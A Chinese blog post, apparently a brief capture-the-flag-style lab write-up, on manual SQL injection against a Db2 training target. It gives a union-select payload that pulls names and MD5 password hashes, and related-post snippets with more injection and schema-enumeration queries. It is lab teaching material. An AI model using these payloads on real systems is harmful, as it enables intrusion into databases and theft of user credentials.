360众测靶场题库之77-SQL手工注入漏洞测试(Db2数据库)

于 2024-03-12 18:19:12 发布
阅读量388 收藏 9
点赞数 5
分类专栏: 360众测靶场题库 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zjl12344/article/details/136659522
版权
本文介绍了通过payload实现的SQL注入攻击案例,展示了如何利用该方法对数据库中的游戏角色表进行未经授权的访问,特别是针对MD5加密的password字段进行解密的过程。
摘要由CSDN通过智能技术生成

payload:

id=2 union select 1,name,password,4 from GAME_CHARACTER limit 1,1

MD5在线解密即可 

BugBounty
关注
  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlinjection in db2数据库
Coisini的博客
05-25 323
使用DB2的人比较少了,今天碰到了一个可供注入DB2网站,想试试身手。不过在网上很难找到相关的资料,只好自己研究了。 参考了IBM DB2的文档,总结了这样几条: 1、select NAME from SYSIBM.SYSTABLES where CREATOR =USER 可以返回系统中所有用户创建的表(table)名 2、select NAME from SYSIBM.SYSCOLUMNS ...
DB2数据库SQL注入语句
02-17
可以试试学习一下,不可以滥用, 猜用户表数量: and 0<(SELECT count(NAME) FROM SYSIBM.SYSTABLES where CREATOR=USER)
墨者 - SQL手工注入漏洞测试(Db2数据库)
吃肉唐僧的博客
07-11 2744
进入环境,用order by测试,发现可以,并测试到字段为4 接下来用union select 1,2,3,4 发现失败 后来上网看了别人的思路是union select 1,2,3,4 from sysibm.systables就可以回显了 应该是不同的数据库语法问题 爆库 id=2 union select 1,2,current schema,4 from sysibm...
刷题笔记:SQL手工注入漏洞测试(Sql Server数据库
m0_67399862的博客
03-26 914
进入网页后,用and语句来判断是否有注入点,当输入and 1=2时,页面报错,而输入and 1=1时,页面恢复,说明可能存在注入点 用order by 语句来判断字段数,因为order by5时页面报错,而order by4时页面没有报错,则说明该字段数为4 用union select语句,但页面报错,网页不兼容,则上网查了查,需要用union all select 但页面仍然报错,考虑字符串的问题,后面的数字逐个加单引号试,直至页面不报错 然后将2的位置换为d...
SQL手工注入漏洞测试(Sql Server数据库)
qq_36933272的博客
08-31 390
寻找注入点 and 1=1 ,and 2=1 判断字段 order by N# 虽然3报错,但4有回显。判断是4个字段 查看回显位置id=2 and 2=1 union all select 1,2,‘3’,4# 查询数据库id=2 and 2=1 union all select 1,2,db_name(),4# 查询表 id=2 and 2=1%20 union all select 1,(s...
SQL手工注入
anan2175的博客
04-25 156
快速判断是否存在SQL注入 不能局限于这几种,要根据网站功能对应的SQL语句进行变化 数字型注入 http://www.evil.com/search?id=1 and 1=1 页面返回的结果与id=1时一样 http://www.evil.com/search?id=1 and 1=2 页面返回结果为空或报错 字符型注入 http://www.evil.com/search?...
渗透测试上传漏洞经典靶场学习-upload-labs
07-02
渗透测试上传漏洞经典靶场学习-upload-labs
SQL注入测试靶场.zip
最新发布
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
vulhub漏洞测试靶场
08-16
Vulhub是一个专门为安全研究人员和渗透测试人员设计的漏洞测试靶场平台,它提供了一系列预配置的漏洞环境,用于学习和实践网络安全技能。这个平台基于Docker容器技术,使得每个漏洞环境可以独立运行,便于管理和复现...
PHP、Apache环境中部署sqli-labs(SQL注入靶场
01-08
sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 知识点 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程中可能会遇到各种...
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。 此资源包含:宽字节注入SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试(Access数据库)、SQL手工注入漏洞测试(PostgreSQL数据库)、SQL手工注入漏洞测试(MongoDB数据库)、SQL手工注入漏洞测试(Sybase数据库)、SQL手工注入漏洞测试(SQLite数据库)、SQL手工注入漏洞测试(Db2数据库)、SQL注入漏洞测试(参数加密)、SQL手工注入漏洞测试(MySQL数据库)、SQL注入漏洞测试(delete注入)、SQL过滤字符后手工注入漏洞测试、延时注入(时间注入)等。 sqlmap等sql注入工具不能利用的SQL注入点,可尝试手工注入,或许有意外的惊喜,满足你的sql注入欲望。 来吧,小伙伴,尽情的下载、然后肆无忌惮的尝试手工注入吧。 来吧,小伙伴,尽情的下载、然后肆无忌惮的尝试手工注入吧。 SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
db2授权linux,IBM DB2未授权访问表漏洞
weixin_30140317的博客
05-15 164
发布日期:2013-08-22更新日期:2013-10-08受影响系统:IBM DB2不受影响系统:IBM DB2 9.xIBM DB2 10.x描述:--------------------------------------------------------------------------------CVE ID: CVE-2013-4033IBM DB2是一个大型的商业关系数据库系统。...
【Web】SQL手工注入Sql Server数据库 (漏洞测试)
HAPPY
07-30 3852
            【Web】SQL手工注入Sql Server数据库 (漏洞测试) 第一步:判断是否有注入,?id=2 and 1=1   正确;id=2 and 1=2  错误,得出有注入点。第二步:判断数据库类型:?id=2  and  exists (select  *  from  sysobjects) 显示正常, 表示是ms sql server数据库。 第三步:sqlmap...
常见数据库漏洞
a1b2c3是弱口令
08-22 8966
MySQL数据库 默认端口:3306 攻击方法: 爆破:弱口令 身份认证漏洞:CVE-2012-2122 拒绝服务攻击 Phpmyadmin万能密码绕过:用户名:‘localhost’@’@” 密码任意 提权 参考: https://www.seebug.org/appdir/MySQL http://www.waitalone.cn/my...
DB2数据库注入
Vi_vids的博客
03-26 1257
db2数据库 这里使用的靶场为墨者学院在线靶场 确定字段数 确定回显位 id=-1 union select 1,2,3,4 from syscat.tables 查看数据库基本信息/爆库 爆表可以使用的表可以是syscat.tables,也可以是syscat.columns、sysibm.sysdummy1 科普时间 sysibm.sysdummy1 表是DB2数据库中的系统表,存放着系统的相关信息 id=-1 union select 1,current schema,current s
SQL注入(四)手工注入攻击步骤
热门推荐
pumpkin9
05-05 4万+
以bugkuctf平台的一道题为例:链接http://120.24.86.145:8002/chengjidan/ 0)首先测试正常数据。 链接的结尾添加【?id=1(数字任意)】 1) 判断是否存在注入点; 【?id=32(数字任意)】链接的结尾依次添加语句【‘】、【and 1=1】和【and 1=2】,来判断网站是否存在注入点。尝试在正常数据后加上单引号,发现数据为空,加...
SQL注入手工检测
zzkkoo8的博客
12-15 1万+
1基本检测 2绕过技巧2017年12月14日 09:36:161、基本检测 数字型 $id=@$_GET['id']; //id未经过滤 $sql = "SELECT * FROM sqltest WHERE id='$id'";判断 asp?id=49' //报错 asp?id=49 and 1=1 asp?id=49 and 1=2判断什么型 ?id=1%2b1 //加法减法,可区分数字
墨者 - SQL手工注入漏洞测试(PostgreSQL数据库)
吃肉唐僧的博客
07-09 1071
用order by测试字段数 字段为4 测试回显位置 /new_list.php?id=1 and 1=2 union select '1','2','3','4' 暴库 /new_list.php?id=1 and 1=2 union select '1',(select current_database()),'3','4' 爆表 ,这里有两种方法...
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2关到24关的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入的学习过程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值